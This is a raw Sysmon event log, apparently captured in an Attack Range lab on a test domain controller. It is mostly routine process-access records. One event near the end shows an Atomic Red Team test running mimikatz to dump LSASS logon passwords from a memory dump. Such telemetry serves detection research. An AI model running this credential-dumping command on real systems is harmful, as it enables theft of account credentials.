10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2901-000000008801}1644C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDF-5FA1-2901-000000008801}1644C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.654{D28789B6-7CDF-5FA1-2901-000000008801}1644C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2801-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2801-000000008801}4812C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2801-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.628{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2801-000000008801}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.642{D28789B6-7CDF-5FA1-2801-000000008801}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %%tmp%%\lsass.DMP" "sekurlsa::logonpasswords full" exit" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand 